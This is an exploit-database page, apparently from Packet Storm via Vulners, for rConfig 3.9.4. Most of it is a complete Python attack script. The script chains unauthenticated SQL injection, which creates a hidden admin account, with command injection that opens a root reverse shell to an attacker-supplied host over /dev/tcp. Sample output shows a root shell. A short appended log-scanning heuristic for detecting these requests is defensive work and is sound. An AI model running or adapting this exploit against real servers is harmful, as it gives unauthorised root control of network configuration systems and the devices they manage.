rConfig 3.9.4 searchField Remote Code Execution

Published 28 Mar 2020 00:00:00. Reported by vikingfr. Type: packetstorm. Source: packetstormsecurity.com. 1121 views.

rConfig 3.9.4 Unauthenticated Code Execution

Related

| Family | Reporter | Title | Published |
|---|---|---|---|
| 0day.today | zdt | rConfig 3.9.3 - Authenticated Remote Code Execution Exploit | 30 Jan 2020 00:00 |
| 0day.today | zdt | rConfig 3.9 - (searchColumn) SQL Injection Exploit | 12 Mar 2020 00:00 |
| 0day.today | zdt | Rconfig 3.x Chained Remote Code Execution Exploit | 17 Mar 2020 00:00 |
| 0day.today | zdt | rConfig 3.9.4 - (searchField) Unauthenticated Root Remote Code Execution Exploit | 28 Mar 2020 00:00 |
| GithubExploit | githubexploit | Exploit for OS Command Injection in Rconfig | 2 Dec 2019 16:32 |
| ATTACKERKB | attackerkb | CVE-2020-10547 | 4 Jun 2020 00:00 |
| ATTACKERKB | attackerkb | CVE-2019-19585 | 8 Aug 2019 00:00 |
| ATTACKERKB | attackerkb | CVE-2020-10548 | 4 Jun 2020 00:00 |
| ATTACKERKB | attackerkb | CVE-2020-10549 | 4 Jun 2020 00:00 |
| ATTACKERKB | attackerkb | CVE-2020-10546 | 4 Jun 2020 00:00 |
```python
# Exploit Title: rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution
# Exploit Author: vikingfr
# Greetz : Orange Cyberdefense - team CSR-SO (https://cyberdefense.orange.com)
# Date: 2020-03-12
# CVE-2019-19509 + CVE-2019-19585 + CVE-2020-10220
# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_root_RCE_unauth.py
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip
# Install scripts :
# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
# https://www.rconfig.com/downloads/scripts/centos7_install.sh
# https://www.rconfig.com/downloads/scripts/centos6_install.sh
# Version: tested v3.9.4
# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
#
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
#
# Example :
# $ python3 rconfig_root_RCE_unauth_final.py http://1.1.1.1 1.1.1.2 3334
# rConfig - 3.9 - Unauthenticated root RCE
# [+] Adding a temporary admin user...
# [+] Authenticating as dywzxuvbah...
# [+] Logged in successfully, triggering the payload...
# [+] Check your listener !
# [+] The reverse shell seems to be opened :-)
# [+] Removing the temporary admin user...
# [+] Done.
#
# $ nc -nvlp 3334
# listening on [any] 3334 ...
# connect to [1.1.1.2] from (UNKNOWN) [1.1.1.1] 46186
# sh: no job control in this shell
# sh-4.2# id
# id
# uid=0(root) gid=0(root) groups=0(root)
# sh-4.2#

#!/usr/bin/python3
import requests
import sys
import urllib.parse
import string
import random
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
from requests.exceptions import Timeout

print ("rConfig - 3.9 - Unauthenticated root RCE")

if len(sys.argv) != 4:
    print ("[+] Usage : ./rconfig_exploit.py https://target yourIP yourPort")
    exit()

target = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]

vuln_page="/commands.inc.php"
vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"
def generateUsername(stringLength=8):
    u= string.ascii_lowercase
    return ''.join(random.sample(u,stringLength))

# Step 1: unauthenticated SQL injection in the search parameters creates a temporary admin account
print ("[+] Adding a temporary admin user...")
fake_id = str(random.randint(200,900))
fake_user = generateUsername(10)
fake_pass_md5 = "21232f297a57a5a743894a0e4a801fc3" # hash of 'admin'
fake_userid_md5 = "6c97424dc92f14ae78f8cc13cd08308d"
userleveladmin = 9 # Administrator
addUserPayload="%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20("+fake_id+",%20'"+fake_user+"',%20'"+fake_pass_md5+"',%20'"+fake_userid_md5+"',%209,%20'"+fake_user+"@domain.com',%201346920339,%201);--"
encoded_request = target+vuln_page+vuln_parameters+addUserPayload
firstrequest = requests.session()
exploit_req = firstrequest.get(encoded_request,verify=False)

# Step 2: log in with the temporary account
request = requests.session()
login_info = {
    "user": fake_user,
    "pass": "admin",
    "sublogin": 1
}
print ("[+] Authenticating as "+fake_user+"...")
login_request = request.post(
    target+"/lib/crud/userprocess.php",
    login_info,
    verify=False,
    allow_redirects=True
)

dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)

# Step 3: authenticated command injection in the ajaxArchiveFiles.php 'path' parameter
payload = ''' `touch /tmp/.'''+fake_user+'''.txt;sudo zip -q /tmp/.'''+fake_user+'''.zip /tmp/.'''+fake_user+'''.txt -T -TT '/bin/sh -i>& /dev/tcp/{0}/{1} 0>&1 #'` '''.format(ip, port)
if dashboard_request.status_code == 200:
    print ("[+] Logged in successfully, triggering the payload...")
    encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload))
    print ("[+] Check your listener !")
    try:
        exploit_req = request.get(encoded_request,timeout=10)
    except Timeout:
        print('[+] The reverse shell seems to be opened :-)')
    else:
        print('[-] The command was not executed by the target or you forgot to open a listener...')

elif dashboard_request.status_code == 302:
    print ("[-] Wrong credentials !? Maybe admin were not added...")
    exit()

# Step 4: clean up the temporary account with the same injection point
print("[+] Removing the temporary admin user...")
delUserPayload="%20;DELETE%20FROM%20`users`%20WHERE%20`username`='"+fake_user+"';--"
encoded_request = target+vuln_page+vuln_parameters+delUserPayload
lastrequest = requests.session()
exploit_req = lastrequest.get(encoded_request,verify=False)
print ("[+] Done.")
```
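From the defender's side, the script above leaves two distinctive request shapes in the web server log: a SQL fragment appended to the `commands.inc.php` search parameters, and shell metacharacters in the `path` parameter of `lib/ajaxHandlers/ajaxArchiveFiles.php`. The following detection heuristic is an added example, not part of the original exploit or the Vulners page; the Apache-style access-log lines and IP addresses it scans are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache common log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Mar/2020:10:00:01 +0000] "GET /commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20;INSERT%20INTO%20%60users%60%20(%60id%60)%20VALUES%20(5);-- HTTP/1.1" 200 512
203.0.113.5 - - [28/Mar/2020:10:00:02 +0000] "POST /lib/crud/userprocess.php HTTP/1.1" 302 0
203.0.113.5 - - [28/Mar/2020:10:00:03 +0000] "GET /lib/ajaxHandlers/ajaxArchiveFiles.php?path=%20%60touch%20/tmp/.x.txt%3B%20sudo%20zip%20-TT%20/bin/sh%60%20&ext=random HTTP/1.1" 200 0
198.51.100.9 - - [28/Mar/2020:10:05:00 +0000] "GET /commands.inc.php?searchOption=contains&searchField=ospf&search=search&searchColumn=command HTTP/1.1" 200 2048
198.51.100.9 - - [28/Mar/2020:10:05:01 +0000] "GET /lib/ajaxHandlers/ajaxArchiveFiles.php?path=/home/rconfig/data/backups&ext=zip HTTP/1.1" 200 0
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
# Heuristics: statement separators / comment markers / DML keywords in a search value,
# and command-substitution or chaining characters in a file path value.
SQLI_RE = re.compile(r'(;|--|\b(INSERT|DELETE|UPDATE|UNION|SELECT)\b)', re.I)
SHELL_RE = re.compile(r'[`;|$]|/dev/tcp')


def classify(line):
    """Return (client_ip, findings) for a parsable line, None otherwise.
    findings is a list of (category, parameter) pairs; empty means benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('url'))
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    findings = []
    if parts.path.endswith('/commands.inc.php'):
        for name in ('searchField', 'searchColumn', 'searchOption'):
            if any(SQLI_RE.search(v) for v in params.get(name, [])):
                findings.append(('sqli', name))
    if parts.path.endswith('/lib/ajaxHandlers/ajaxArchiveFiles.php'):
        if any(SHELL_RE.search(v) for v in params.get('path', [])):
            findings.append(('cmdi', 'path'))
    return m.group('ip'), findings


def scan(log_text):
    """Return [(client_ip, findings)] for every line that triggers at least one heuristic."""
    alerts = []
    for line in log_text.splitlines():
        result = classify(line)
        if result and result[1]:
            alerts.append(result)
    return alerts


if __name__ == '__main__':
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, findings)
```

Both heuristics are intentionally loose (a legitimate search term containing `--` will fire), so treat hits as triage signals and correlate them with the `userprocess.php` login that follows in the sample.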

Published: 28 Mar 2020 00:00 (current). Vulners risk score: 0.1 (low risk). Vulners AI Score: 0.1. EPSS: 0.99683.